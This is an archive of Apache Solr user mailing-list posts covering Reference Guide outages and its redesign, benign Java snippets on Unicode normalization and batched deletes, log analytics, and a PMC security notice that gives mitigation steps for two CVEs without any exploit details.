Re: Apache Solr Reference Guide isn't accessible

2021-02-02 Thread Cassandra Targett
Did you file an issue for this error?
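
For reference, the Annex #15 wording quoted below is the correct one: NFC and
NFKC end with a composition step, while NFD and NFKD stop at decomposition. If
anyone wants to confirm the behavior, here is a quick, untested sketch using
ICU4J (the library Solr's ICU analysis components are built on); it only needs
icu4j on the classpath:

import com.ibm.icu.text.Normalizer2;

public class NormalizationCheck {
  public static void main(String[] args) {
    String composed = "\u00e9";      // "é" as a single precomposed code point
    String decomposed = "e\u0301";   // "e" followed by a combining acute accent

    Normalizer2 nfc = Normalizer2.getNFCInstance();
    Normalizer2 nfd = Normalizer2.getNFDInstance();

    // NFC: canonical decomposition followed by canonical composition -> 1 code unit
    System.out.println(nfc.normalize(decomposed).length());   // prints 1
    // NFD: canonical decomposition only -> 2 code units
    System.out.println(nfd.normalize(composed).length());     // prints 2
  }
}
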
On Feb 2, 2021, 1:31 AM -0600, Bernd Fehling , 
wrote:
> Yeah, but guide 8.8 is still buggy.
>
> As I reported a month ago, "ICU Normalizer 2 Filter" states:
> - NFC: ... Normalization Form C, canonical decomposition
> - NFD: ... Normalization Form D, canonical decomposition, followed by 
> canonical composition
> - NFKC: ... Normalization Form KC, compatibility decomposition
> - NFKD: ... Normalization Form KD, compatibility decomposition, followed by 
> canonical composition
>
> But the link to "Unicode Standard Annex #15" right above says:
> - NFC: ... Normalization Form C, Canonical Decomposition, followed by 
> Canonical Composition
> - NFD: ... Normalization Form D, Canonical Decomposition
> - NFKC: ... Normalization Form KC, Compatibility Decomposition, followed by 
> Canonical Composition
> - NFKD: ... Normalization Form KD, Compatibility Decomposition
>
> But, well who cares.
>
> Have a nice day.
>
>
> Am 01.02.21 um 23:04 schrieb Cassandra Targett:
> > The problem causing this has been fixed and the docs should be available 
> > again.
> > On Feb 1, 2021, 2:15 PM -0600, Alexandre Rafalovitch , 
> > wrote:
> > > And if you need something more recent while this is being fixed, you
> > > can look right at the source in GitHub, though navigation, etc. is
> > > missing:
> > > https://github.com/apache/lucene-solr/blob/master/solr/solr-ref-guide/src/analyzers.adoc
> > >
> > > Open Source :-)
> > >
> > > Regards,
> > > Alex.
> > >
> > > On Mon, 1 Feb 2021 at 15:04, Mike Drob  wrote:
> > > >
> > > > Hi Dorion,
> > > >
> > > > We are currently working with our infra team to get these restored. In 
> > > > the
> > > > meantime, the 8.4 guide is still available at
> > > > https://lucene.apache.org/solr/guide/8_4/, and we are hopeful that the 8.8
> > > > guide will be back up soon. Thank you for your patience.
> > > >
> > > > Mike
> > > >
> > > > On Mon, Feb 1, 2021 at 1:58 PM Dorion Caroline 
> > > > 
> > > > wrote:
> > > >
> > > > > Hi,
> > > > >
> > > > > I haven't been able to access the Apache Solr Reference Guide for a few days.
> > > > > Example:
> > > > > URL
> > > > >
> > > > > * https://lucene.apache.org/solr/guide/8_8/
> > > > > * https://lucene.apache.org/solr/guide/8_7/
> > > > > Result:
> > > > > Not Found
> > > > > The requested URL was not found on this server.
> > > > >
> > > > > Do you know what's going on?
> > > > >
> > > > > Thanks
> > > > > Caroline Dorion
> > > > >
> >


Re: Apache Solr Reference Guide isn't accessible

2021-02-01 Thread Cassandra Targett
The problem causing this has been fixed and the docs should be available again.
On Feb 1, 2021, 2:15 PM -0600, Alexandre Rafalovitch , 
wrote:
> And if you need something more recent while this is being fixed, you
> can look right at the source in GitHub, though navigation, etc. is
> missing:
> https://github.com/apache/lucene-solr/blob/master/solr/solr-ref-guide/src/analyzers.adoc
>
> Open Source :-)
>
> Regards,
> Alex.
>
> On Mon, 1 Feb 2021 at 15:04, Mike Drob  wrote:
> >
> > Hi Dorion,
> >
> > We are currently working with our infra team to get these restored. In the
> > meantime, the 8.4 guide is still available at
> > https://lucene.apache.org/solr/guide/8_4/, and we are hopeful that the 8.8
> > guide will be back up soon. Thank you for your patience.
> >
> > Mike
> >
> > On Mon, Feb 1, 2021 at 1:58 PM Dorion Caroline 
> > 
> > wrote:
> >
> > > Hi,
> > >
> > > I haven't been able to access the Apache Solr Reference Guide for a few days.
> > > Example:
> > > URL
> > >
> > > * https://lucene.apache.org/solr/guide/8_8/
> > > * https://lucene.apache.org/solr/guide/8_7/
> > > Result:
> > > Not Found
> > > The requested URL was not found on this server.
> > >
> > > Do you know what's going on?
> > >
> > > Thanks
> > > Caroline Dorion
> > >


Re: Is the lucene.apache.org link dead?

2021-02-01 Thread Cassandra Targett
This problem has been fixed and docs should be available again. Please let us 
know if you still have problems accessing anything.
On Feb 1, 2021, 8:32 AM -0600, Cassandra Targett , wrote:
> There were some issues while publishing the various bits for 8.8 and Lucene 
> and Solr Javadocs and Ref Guides for 8.5-8.7 are currently missing. The 
> project is working on getting those versions back as soon as possible.
>
> We apologize for this situation, hopefully it won’t be too long today before 
> we have it fixed.
> On Feb 1, 2021, 3:33 AM -0600, Atita Arora , wrote:
> > True, the link has been down since last week. I checked, as we are currently in the
> > state of migration to 8.7 too.
> >
> >
> > On Mon, Feb 1, 2021 at 6:57 AM Taisuke Miyazaki 
> > wrote:
> >
> > > Hi,
> > > I tried to open the Solr News page to check the contents of the Solr
> > > release, but it returns Not Found.
> > > I think it's either the wrong link or the link is messed up.
> > > If there is a problem, do you think you can fix it?
> > >
> > > Sorry if this has already been discussed somewhere.
> > >
> > > Solr News Page: https://lucene.apache.org/solr/news.html
> > > Dead Link: https://lucene.apache.org/solr/8_7_0/changes/Changes.html
> > >
> > > Thank you.
> > > Taisuke.
> > >


Re: Is the lucene.apache.org link dead?

2021-02-01 Thread Cassandra Targett
There were some issues while publishing the various bits for 8.8 and Lucene and 
Solr Javadocs and Ref Guides for 8.5-8.7 are currently missing. The project is 
working on getting those versions back as soon as possible.

We apologize for this situation, hopefully it won’t be too long today before we 
have it fixed.
On Feb 1, 2021, 3:33 AM -0600, Atita Arora , wrote:
> True, the link has been down since last week. I checked, as we are currently in the
> state of migration to 8.7 too.
>
>
> On Mon, Feb 1, 2021 at 6:57 AM Taisuke Miyazaki 
> wrote:
>
> > Hi,
> > I tried to open the Solr News page to check the contents of the Solr
> > release, but it returns Not Found.
> > I think it's either the wrong link or the link is messed up.
> > If there is a problem, do you think you can fix it?
> >
> > Sorry if this has already been discussed somewhere.
> >
> > Solr News Page: https://lucene.apache.org/solr/news.html
> > Dead Link: https://lucene.apache.org/solr/8_7_0/changes/Changes.html
> >
> > Thank you.
> > Taisuke.
> >


Re: Analytics for Solr logs

2020-10-14 Thread Cassandra Targett
While the tool is only included in 8.5 and higher, it will index logs from any 
version of Solr 7.x or 8.x (and possibly even 6.x). So if you want to use it, 
you could download Solr 8.5 or higher to your local machine and index your 
8.4.1 logs there, or use an 8.5 or higher Docker image. You probably need to 
copy them locally; AFAIK, it can't take a URL to go get files from a non-local 
filestore like S3, etc.

I use it at least weekly in my work…it’s an immense help in troubleshooting 
when you aren’t sure what’s going on with the system.
On Oct 14, 2020, 3:50 AM -0500, Zisis T. , wrote:
> Thanks Alexandre, silly me. I thought 8.4.1 was recent enough...
>
>
>
> --
> Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Vulnerabilities in SOLR 8.6.2

2020-09-29 Thread Cassandra Targett
Solr follows the ASF policy for reporting vulnerabilities, described in this 
page on our website: https://lucene.apache.org/solr/security.html. This page 
also lists known vulnerabilities that have been addressed, with their 
mitigation steps.

Scanning tools commonly produce many false positives, so the community does not 
accept unfiltered scanner output (such as a spreadsheet) as a vulnerability 
report.

We attempt to maintain a list of known false positives (also linked from the 
website) at: 
https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity#SolrSecurity-SolrandVulnerabilityScanningTools.
 But in all honesty, such a list is really hard to keep up with. Exact versions 
in your report may differ from what’s on the list, but usually the general 
conclusion that it’s not an exploitable issue remains. For example, our list 
notes a CVE for ‘dom4j-1.6.1.jar' is not an exploitable vulnerability because 
it is only used in tests. If a CVE comes out for ‘dom4j-1.7.3.jar’ (if such a 
version exists), the fact remains that the dependency is only used in tests and 
is still not exploitable in a production system.

If you do find a real vulnerability you are concerned about, ASF policy is for 
you to privately report it to the community so it can be addressed before 
hackers have a chance to attempt to exploit user systems. How to do that is 
also described in the Security page in our website linked above.

-Cassandra
On Sep 28, 2020, 2:07 PM -0500, Narayanan, Lakshmi 
, wrote:
> Hello Solr-User Support team
> We have installed the SOLR 8.6.2 package into a Docker container in our DEV 
> environment. Prior to using it, our security team scanned the Docker image 
> using SysDig and found a lot of Critical/High/Medium vulnerabilities. The 
> full list is in the attached spreadsheet
>
> Scan Summary
> 30 STOPS 190 WARNS    188 Vulnerabilities
>
> Please advise or point us to how/where to get a package that has been patched 
> for the Critical/High/Medium vulnerabilities in the attached spreadsheet
> Your help will be gratefully received
>
>
> Lakshmi Narayanan
> Marsh & McLennan Companies
> 121 River Street, Hoboken,NJ-07030
> 201-284-3345
> M: 845-300-3809
> Email: lakshmi.naraya...@mmc.com
>
>
>
>
>


Re: Solr Deletes

2020-05-29 Thread Cassandra Targett
I’m coming in a little late, but as of 8.5 there is a new streaming expression 
designed for DBQ situations which basically does what Erick was suggesting - 
gets a list of IDs for a query then does a delete by ID: 
https://lucene.apache.org/solr/guide/8_5/stream-decorator-reference.html#delete.

It won’t help if you’re not on 8.5, but going forward will be a good option for 
large delete sets.
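
For anyone who can't move to 8.5 yet, here is a rough, untested SolrJ sketch of 
the approach Erick described: page through the matching documents with a cursor, 
collect only their IDs, and delete by ID in batches. The ZooKeeper address, 
collection name, and query below are placeholders, so adjust them for your setup.

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Optional;

import org.apache.solr.client.solrj.SolrQuery;
import org.apache.solr.client.solrj.impl.CloudSolrClient;
import org.apache.solr.client.solrj.response.QueryResponse;
import org.apache.solr.common.SolrDocument;
import org.apache.solr.common.params.CursorMarkParams;

public class BatchedDeleteById {
  public static void main(String[] args) throws Exception {
    try (CloudSolrClient client = new CloudSolrClient.Builder(
        Collections.singletonList("localhost:2181"), Optional.empty()).build()) {
      client.setDefaultCollection("mycollection");          // placeholder collection

      SolrQuery q = new SolrQuery("category:discontinued"); // placeholder query
      q.setFields("id");
      q.setRows(1000);                                      // page/batch size
      q.setSort(SolrQuery.SortClause.asc("id"));            // cursors require a sort on the uniqueKey

      String cursor = CursorMarkParams.CURSOR_MARK_START;
      while (true) {
        q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursor);
        QueryResponse rsp = client.query(q);

        List<String> ids = new ArrayList<>();
        for (SolrDocument doc : rsp.getResults()) {
          ids.add((String) doc.getFieldValue("id"));
        }
        if (!ids.isEmpty()) {
          client.deleteById(ids);                           // delete-by-id, not delete-by-query
        }

        String next = rsp.getNextCursorMark();
        if (next.equals(cursor)) {                          // cursor stops advancing when all pages are read
          break;
        }
        cursor = next;
      }
      // Deletes only become visible after the commit, so they don't disturb the cursor.
      client.commit();
    }
  }
}

On 8.5 or later, the delete streaming expression linked above does essentially 
the same thing for you, so it is the simpler route going forward.
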
On May 26, 2020, 8:09 PM -0500, Dwane Hall , wrote:
> Thank you very much Erick, Emir, and Bram, this is extremely useful advice and I 
> sincerely appreciate everyone’s input!
>
>
> Before I received your responses I ran a controlled DBQ test in our DR 
> environment and exactly what you said occurred. It was like reading a step by 
> step playbook of events with heavy blocking occurring on the Solr nodes and 
> lots of threads going into a TIMED_WAITING state. Several shards were pushed 
> into recovery mode and things were starting to get ugly, fast!
>
>
> I'd read snippets in blog posts and JIRA tickets about DBQ being a blocking 
> operation, but I did not expect that such a specific DBQ (i.e., by IDs) 
> would behave so differently from DBID (which I expected to block as 
> well). Boy was I wrong! They're used interchangeably in the Solr Ref Guide 
> examples, so it’s very useful to understand the performance implications of 
> each. Additionally, none of the information I found on delete operations 
> mentioned query performance, so I was unsure of its impact in this dimension.
>
>
> Erick, thanks again for your comprehensive response. Your blogs and user group 
> responses are always a pleasure to read, and I'm constantly picking up useful 
> pieces of information that I use on a daily basis in managing our Solr/Fusion 
> clusters. Additionally, I've been looking for an excuse to use streaming 
> expressions, and I did not think to use them the way you suggested. I've 
> watched quite a few of Joel's presentations on YouTube and his blog is 
> brilliant. Streaming expressions are expanding with every Solr release; they 
> really are a very exciting part of Solr's evolution. Your final point about 
> searcher state while streaming expressions are running, and its relationship 
> with new searchers, is a very interesting additional piece of information I’ll 
> add to the toolbox. Thank you.
>
>
>
> At the moment we're fortunate to have all the IDs of the documents to remove 
> in a DB, so I'll be able to construct batches of DBID requests relatively 
> easily and store them in a backlog table for processing without needing to 
> traverse Solr with cursors, streaming (or other means) to identify them. We 
> follow a similar approach for updates in batches of around ~1000 docs/batch. 
> Inspiration for that sweet spot was once again determined after reading one 
> of Erik's Lucidworks blog posts and testing 
> (https://lucidworks.com/post/really-batch-updates-solr-2/).
>
>
>
> Again thanks to the community and users for everyone’s contribution on the 
> issue it is very much appreciated.
>
>
> Successful Solr-ing to all,
>
>
> Dwane
>
> 
> From: Bram Van Dam 
> Sent: Wednesday, 27 May 2020 5:34 AM
> To: solr-user@lucene.apache.org 
> Subject: Re: Solr Deletes
>
> On 26/05/2020 14:07, Erick Erickson wrote:
> > So best practice is to go ahead and use delete-by-id.
>
>
> I've noticed that this can cause issues when using implicit routing, at
> least on 7.x. Though I can't quite remember whether the issue was a
> performance issue, or whether documents would sometimes not get deleted.
>
> In either case, I worked around it by doing something like this:
>
> UpdateRequest req = new UpdateRequest();
> req.deleteById(id);
> req.setCommitWithin(-1);
> req.setParam(ShardParams._ROUTE_, shard);
>
> Maybe that'll help if you run into either of those issues.
>
> - Bram


Re: Solr Ref Guide Redesign coming in 8.6

2020-04-29 Thread Cassandra Targett
> This design still has a minor annoyance that I have noted in the past:
> in the table of contents pane it is easy to open a subtree, but the
> only way to close it is to open another one. Obviously not a big
> deal.

Thanks for pointing that out; it helped me find a big problem, which was that I 
used the wrong build of jQuery to support using the caret to open/close the 
subtree. Opening a subtree independently of clicking the heading should work 
now, and closing the subtree should as well.
> I'll probably spend too much time researching how to widen the
> razor-thin scrollbar in the TOC panel, since it seems to be
> independent of the way I spent too much time fixing the browser's own
> inadequate scrollbar width. :-) Also, the thumb's color is so close to
> the surrounding color that it's really hard to see. And for some
> reason when I use the mouse wheel to scroll the TOC, when it gets to
> the top or the bottom the content pane starts scrolling instead, which
> is surprising and mildly inconvenient. Final picky point: the
> scrolling is *very* insensitive -- takes a lot of wheel motion to move
> the panel just a bit.

I’m not totally following all of this, but if I assume you mean the left 
sidebar navigation (and not an in-page TOC) then my answer to at least part of 
it is to pare down the list of top-level topics so you don’t have to scroll it 
at all and then the only scrolling you need to do is for the content itself. 
That’s what I want to do in Phase 2, so there are several things in the 
behavior of the sidebar I’m purposely ignoring for now. Some will go away with 
a new organization and new things will be introduced that will need to be 
fixed, so to save myself some time I’m waiting to fix all of it at once.


Re: Solr Ref Guide Redesign coming in 8.6

2020-04-29 Thread Cassandra Targett
To respond to the feedback so far:

Version picker: This is more complex than it may be initially assumed
because of the way we publish the site. Since we use a static site
generator, each page is a standalone HTML file. To add a version picker to
an older version that includes all the latest versions, we'd need to
republish all the older versions every time we published a new one. We
could get around this by pointing a version picker to a location we update
each time (but still today would need to republish all the older versions
to add it at all), which was harder to do in the past due to how the Solr
website as a whole was published. I wanted to try to address this problem
in what I'm calling Phase 3 - moving to a different static site generator
that supports multiple versions in a more native way but maybe I can find a
simple stopgap until then.

Jumpiness while hovering over nav items: The font size isn't actually
different when you hover or select a nav item, it's just bolded which makes
it overrun the allotted space and wrap. I made it bolded in response to
other feedback I got earlier on that there was not enough differentiation
between selected and not-selected items but didn't notice the jumpiness (I
had to make my screen quite large to duplicate it, and when I looked at the
Guide on larger screens earlier I was usually looking at some other problem
and just didn't notice). I'll play with it a little and find another way to
differentiate the items without bolding them.

Thanks for your comments so far!

On Wed, Apr 29, 2020 at 2:56 AM Colvin Cowie 
wrote:

> In addition to those points, I think it generally does look good but the
> thing I've noticed is that increase in text size on rollover in the menu
> makes it quite jumpy:
> https://drive.google.com/open?id=15EF0T_C_l8OIDuW8QHOFunL4VzxtyVyb
>
> On Wed, 29 Apr 2020 at 08:15, Bernd Fehling <
> bernd.fehl...@uni-bielefeld.de>
> wrote:
>
> > +1
> >
> > And a fully indexed search for the Ref Guide.
> > I have to use Google to search for info in the Ref Guide of a search engine.
> > :-(
> >
> >
> > Am 29.04.20 um 02:11 schrieb matthew sporleder:
> > > I highly recommend a version selector in the header!  I am *always*
> > > landing on 6.x docs from google.
> > >
> > > On Tue, Apr 28, 2020 at 5:18 PM Cassandra Targett  >
> > wrote:
> > >>
> > >> In case the list breaks the URL to view the Jenkins build, here's a
> > shorter
> > >> URL:
> > >>
> > >> https://s.apache.org/df7ew.
> > >>
> > >> On Tue, Apr 28, 2020 at 3:12 PM Cassandra Targett <
> ctarg...@apache.org>
> > >> wrote:
> > >>
> > >>> The PMC would like to engage the Solr user community for feedback on
> an
> > >>> extensive redesign of the Solr Reference Guide I've just committed to
> > the
> > >>> master (future 9.0) branch.
> > >>>
> > >>> You can see the new design from our Jenkins build of master:
> > >>>
> > >>>
> >
> https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-master/javadoc/
> > >>>
> > >>> The hope is that you will receive these changes positively. If so,
> > we'll
> > >>> use this for the upcoming 8.6 Ref Guide and future releases. We also
> > may
> > >>> re-publish earlier 8.x versions so they use this design.
> > >>>
> > >>> I embarked on this project last December simply as an attempt to
> > upgrade
> > >>> the version of Bootstrap used by the Guide. After a couple of days,
> I'd
> > >>> changed the layout entirely. In the ensuing few months I've tried to
> > iron
> > >>> out the kinks and made some extensive changes to the "backend" (the
> > CSS,
> > >>> JavaScript, etc.).
> > >>>
> > >>> I'm no graphic designer, but some of my guiding thoughts were to try
> to
> > >>> make full use of the browser window, improve responsiveness for
> > different
> > >>> sized screens, and just give it a more modern feel. The full list of
> > what
> > >>> has changed is detailed in the Jira issue if you are interested:
> > >>> https://issues.apache.org/jira/browse/SOLR-14173
> > >>>
> > >>> This is Phase 1 of several changes. There is one glaring remaining
> > issue,
> > >>> which is that our list of top-level categories is too long for the
> new
> > >>> design. I've punted fixing that to Phase 2, which will be an
> extensive
> > >>> re-consideration of how the Ref Guide is organized with the goal of
> > >>> trimming down the top-level categories to only 4-6. SOLR-1 will
> > track
> > >>> phase 2.
> > >>>
> > >>> One last thing to note: this redesign really only changes the
> > presentation
> > >>> of the pages and some of the framework under the hood - it doesn't
> yet
> > add
> > >>> full-text search. All of the obstacles to providing search still
> > exist, but
> > >>> please know that we fully understand frustration on this point and
> > still
> > >>> hope to fix it.
> > >>>
> > >>> I look forward to hearing your feedback in this thread.
> > >>>
> > >>> Best,
> > >>> Cassandra
> > >>>
> >
>


Re: Solr Ref Guide Redesign coming in 8.6

2020-04-28 Thread Cassandra Targett
In case the list breaks the URL to view the Jenkins build, here's a shorter
URL:

https://s.apache.org/df7ew.

On Tue, Apr 28, 2020 at 3:12 PM Cassandra Targett 
wrote:

> The PMC would like to engage the Solr user community for feedback on an
> extensive redesign of the Solr Reference Guide I've just committed to the
> master (future 9.0) branch.
>
> You can see the new design from our Jenkins build of master:
>
> https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-master/javadoc/
>
> The hope is that you will receive these changes positively. If so, we'll
> use this for the upcoming 8.6 Ref Guide and future releases. We also may
> re-publish earlier 8.x versions so they use this design.
>
> I embarked on this project last December simply as an attempt to upgrade
> the version of Bootstrap used by the Guide. After a couple of days, I'd
> changed the layout entirely. In the ensuing few months I've tried to iron
> out the kinks and made some extensive changes to the "backend" (the CSS,
> JavaScript, etc.).
>
> I'm no graphic designer, but some of my guiding thoughts were to try to
> make full use of the browser window, improve responsiveness for different
> sized screens, and just give it a more modern feel. The full list of what
> has changed is detailed in the Jira issue if you are interested:
> https://issues.apache.org/jira/browse/SOLR-14173
>
> This is Phase 1 of several changes. There is one glaring remaining issue,
> which is that our list of top-level categories is too long for the new
> design. I've punted fixing that to Phase 2, which will be an extensive
> re-consideration of how the Ref Guide is organized with the goal of
> trimming down the top-level categories to only 4-6. SOLR-1 will track
> phase 2.
>
> One last thing to note: this redesign really only changes the presentation
> of the pages and some of the framework under the hood - it doesn't yet add
> full-text search. All of the obstacles to providing search still exist, but
> please know that we fully understand frustration on this point and still
> hope to fix it.
>
> I look forward to hearing your feedback in this thread.
>
> Best,
> Cassandra
>


Solr Ref Guide Redesign coming in 8.6

2020-04-28 Thread Cassandra Targett
The PMC would like to engage the Solr user community for feedback on an
extensive redesign of the Solr Reference Guide I've just committed to the
master (future 9.0) branch.

You can see the new design from our Jenkins build of master:
https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-master/javadoc/

The hope is that you will receive these changes positively. If so, we'll
use this for the upcoming 8.6 Ref Guide and future releases. We also may
re-publish earlier 8.x versions so they use this design.

I embarked on this project last December simply as an attempt to upgrade
the version of Bootstrap used by the Guide. After a couple of days, I'd
changed the layout entirely. In the ensuing few months I've tried to iron
out the kinks and made some extensive changes to the "backend" (the CSS,
JavaScript, etc.).

I'm no graphic designer, but some of my guiding thoughts were to try to
make full use of the browser window, improve responsiveness for different
sized screens, and just give it a more modern feel. The full list of what
has changed is detailed in the Jira issue if you are interested:
https://issues.apache.org/jira/browse/SOLR-14173

This is Phase 1 of several changes. There is one glaring remaining issue,
which is that our list of top-level categories is too long for the new
design. I've punted fixing that to Phase 2, which will be an extensive
re-consideration of how the Ref Guide is organized with the goal of
trimming down the top-level categories to only 4-6. SOLR-1 will track
phase 2.

One last thing to note: this redesign really only changes the presentation
of the pages and some of the framework under the hood - it doesn't yet add
full-text search. All of the obstacles to providing search still exist, but
please know that we fully understand frustration on this point and still
hope to fix it.

I look forward to hearing your feedback in this thread.

Best,
Cassandra


Re: Is Banana deprecated?

2020-04-21 Thread Cassandra Targett
Banana is a fork, developed by Lucidworks, of a very old version of Kibana 
(Kibana 3.x). It’s technically out of scope for this list, as the Solr community 
has nothing to do with maintaining it.

(Full disclosure, I work at Lucidworks. However, I’m on a different team and 
have no idea about Banana’s development cycle/roadmap.)

Personally, I think it’s fine for some use cases, but many users have had 
problems with queries bogging down their Solr instances and causing overall 
slowness. This is because behind every panel is a Solr query, so to draw every 
panel a new query is issued. If you have a complex dashboard with even 
semi-complex queries it adds load, possibly a lot of load. It might be fine for 
you, though, depending on what you use it for and how much data you are working 
with.

I will say there are more up-to-date Solr integrations actively maintained by 
the Solr community that may satisfy similar needs:

If you’re looking for something like log analytics, take a look at using 
streaming expressions for this: 
https://github.com/apache/lucene-solr/blob/visual-guide/solr/solr-ref-guide/src/logs.adoc.
 This approach can be adapted for whatever kind of data you have and want to 
visualize.

If you want to track metrics, integrating with something like Prometheus & 
Grafana might be better: 
https://lucene.apache.org/solr/guide/monitoring-solr-with-prometheus-and-grafana.html.

Hope it helps -
Cassandra
On Apr 16, 2020, 6:41 PM -0500, S G , wrote:
> Hello,
>
> I still see releases happening on it:
> https://github.com/lucidworks/banana/pull/355
>
> So it is something recommended to be used for production?
>
> Regards,
> SG


PMC update on Solr vulnerabilities: CVEs 2019-12409 and 2019-17558

2019-11-29 Thread Cassandra Targett
Some of you may have seen an article earlier this week by ZDNet describing
two vulnerabilities in Apache Solr that have also been published elsewhere.
The Lucene PMC would like to update our user community about what we have
done and are doing to address the two issues.

The first issue noted, CVE-2019-12409, was announced a couple of weeks ago
and exists in Solr 8.1.1-8.2.0. This issue was caused by a bad default
option in the ‘solr.in.sh' configuration file to allow remote JMX
connections by default and can be mitigated by changing the setting. More
details are in the mailing list announcement here:
https://s.apache.org/98nsn. Solr 8.3.0 properly sets the correct default
option.

The second issue allows Remote Code Execution through custom Velocity
templates. This issue now has a CVE: 2019-17558. It affects versions 7.0.0
through 8.3.0.

Solr is working on an 8.3.1 release to fix this bug; we are voting on a
release candidate now and it should be released by early next week. We will
make a formal announcement about it and update the CVE databases when 8.3.1
is released. We will likely also release a 7.7.3 for users still on 7.x,
but have not initiated that release process yet.

This vulnerability is only available to attackers if these conditions are
in place:

1. You have not disabled the Config API, or do not restrict access to the
Config API via authentication/authorization settings
2. You allow connections to Solr APIs from outside your firewall

You can mitigate this vulnerability right now by setting the system
parameter “-Ddisable.configEdit=true” and restarting Solr. If you already
have secured Solr behind a firewall and you have authentication for all
users in place, then we believe your risk of this bug is very low. If you
don’t use the Config API, we’d recommend disabling it even if you have a
firewall and authentication in place.

In future releases, we plan to minimize the set of enabled, pre-configured
plugins in Solr's default configset. This will not only reduce security
risks but will also be a simplification. A new plugin management system is
coming soon, and we will look to use that as much as possible to make Solr
as secure as possible out of the box.

We'd like to make sure everyone is aware of the wiki page that the PMC
maintains about known vulnerabilities:
https://cwiki.apache.org/confluence/display/solr/SolrSecurity. This page
provides a straightforward way to know what vulnerabilities have been
discovered to date, if your version is impacted, and how to mitigate your
risks.

Now is also a great time to take a few moments to review how you have
secured your Solr installation. You should always put Solr behind a
firewall, require SSL, and implement authentication for all users at a
minimum. These steps make any attack more difficult to execute.
Historically, there have been very few vulnerabilities reported to Solr
that did not first require a bad actor to have unauthorized access to the
system. As with any system, adopting a defense-in-depth approach to
securing Solr is a best practice. Be sure to refer to the Solr Reference
Guide section for more details about available configuration options:
https://lucene.apache.org/solr/guide/securing-solr.html.

If you have questions about securing Solr after reviewing available
information and documentation, please feel free to ask a question on this
mailing list and we will work to get you a response as quickly as we can.
To report a suspected vulnerability, please email secur...@lucene.apache.org
.

Best Regards,
The Lucene PMC


Re: [ANNOUNCE] Apache Solr 8.3.0 released

2019-11-05 Thread Cassandra Targett
We’re still working out the changes to the publication process, and got a 
couple wires crossed that prevented the Ref Guide from being published at the 
same time for this release.

I’ve published the final version now: http://lucene.apache.org/solr/guide/8_3/.

Apologies for the confusion, by the next release we expect to have all this 
worked out.
On Nov 4, 2019, 2:30 AM -0600, Paras Lehana , wrote:
> Hey Ishan,
>
> Some days back it was announced that the focus will now mainly be on the
> HTML guide, and thus the 8.2 guide was released (which was said to be
> shorter than 8.0). *Can we expect the 8.3 Ref Guide in the coming days*, or is
> it maybe not required? Asking because we are planning to upgrade to the latest
> stable Solr version, and to keep ourselves up to date we will be referring to
> the latest guide and the changes incorporated in each release.
>
> On Sun, 3 Nov 2019 at 04:34, Ishan Chattopadhyaya 
> wrote:
>
> > ## 2 November 2019, Apache Solr™ 8.3.0 available
> >
> > The Lucene PMC is pleased to announce the release of Apache Solr 8.3.0.
> >
> > Solr is the popular, blazing fast, open source NoSQL search platform
> > from the Apache Lucene project. Its major features include powerful
> > full-text search, hit highlighting, faceted search, dynamic
> > clustering, database integration, rich document handling, and
> > geospatial search. Solr is highly scalable, providing fault tolerant
> > distributed search and indexing, and powers the search and navigation
> > features of many of the world's largest internet sites.
> >
> > Solr 8.3.0 is available for immediate download at:
> >
> > 
> >
> > ### Solr 8.3.0 Release Highlights:
> >
> > *Two dimensional routed aliases are now available for organizing
> > collections based on the data values of two fields
> > *SPLITSHARD implements a new splitByPrefix option that takes into
> > account the actual document distribution when using compositeIds
> > *QueryElevationComponent can have query rules configured with
> > match="subset" wherein the words need only match a subset of the
> > query's words and in any order
> > *Command line option to export documents to a file
> > *Support deterministic replica routing preferences for better cache usage
> > *Ability to query aliases in Solr Admin UI
> > *JWTAuthPlugin supports multiple JWKS endpoints and multiple IdP issuers
> > *JSON faceting now supports arbitrary ranges for range facets
> > *Support integral plots, cosine distance and string truncation with
> > math expressions (Joel Bernstein)
> > *New cat() stream source to create tuples from lines in local files
> > *Add upper, lower, trim and split Stream Evaluators
> > *Add CsvStream, TsvStream Streaming Expressions and supporting
> > Stream Evaluators
> > *Add CaffeineCache, an efficient implementation of SolrCache
> > *Live SPLITSHARD can lose updates due to cluster state change
> > between checking if the current shard is active and later checking if
> > there are any sub-shard leaders to forward the update to
> > *Fix for SPLITSHARD (async) with failures in underlying
> > sub-operations can result in data loss
> > *Allow dynamic resizing of SolrCache-s
> > *Allow optional redaction of data saved by 'bin/solr autoscaling -save'
> > *Optimized large managed schema modifications (internal O(n^2) problem)
> > *Max idle time support for SolrCache implementations
> > *Add Prometheus Exporter GC and Heap options
> > *SSL: Adding Enabling/Disabling client's hostname verification config
> > *Introducing SolrClient.ping(collection) in SolrJ
> > *Fix for CDCR bootstrap not replicating index to the replicas of
> > target cluster
> > *Fixed a race condition when initializing metrics for new security
> > plugins on security.json change
> > *Fixed JWTAuthPlugin to update metrics prior to continuing w/other
> > filters or returning error
> > *Fixed distributed grouping when multiple 'fl' params are specified
> > *JMX MBeans are not exposed because of race condition between
> > creating platform mbean server and registering mbeans
> > *Fix for class-cast issues during atomic-update 'removeregex' operations
> > *Fix for multi-node race condition to create/remove nodeLost markers
> > *Fix for too many cascading calls to remote servers, which can bring
> > down nodes
> > *Fix for MOVEREPLICA ignoring replica type and always adding 'nrt'
> > replicas
> > *Fix: DistributedZkUpdateProcessor should propagate URP.finish()
> > lifecycle (regression since 8.1)
> >
> >
> > Please read CHANGES.txt for a full list of new features and changes:
> >
> > 
> >
> > Solr 8.3.0 also includes features, optimizations and bugfixes in the
> > corresponding Apache Lucene release:
> >
> > 
> >
> >
> > Note: The Apache Software Foundation uses an extensive mirroring network
> > for
> > distributing releases. It is possible that the mirror you 

Re: ant precommit fails on .adoc files

2019-10-30 Thread Cassandra Targett
On Oct 29, 2019, 10:44 AM -0500, Shawn Heisey , wrote:
>
> I tried once to build a Solr package on Windows. It didn't work,
> requiring tools that are not normally found on Windows. What I found
> for this thread seems to indicate that the source validation for the ref
> guide does not work correctly either. I would be interested in finding
> out whether or not we expect the build system to work right on Windows.
> I suspect that it is not supported.
>

Just to be clear, the error from the original poster was thrown from the 
‘validate-source-patterns’ task, which is a dependency of the ‘validate’ task 
of precommit and doesn’t use the Ref Guide tooling. It just happened to dislike 
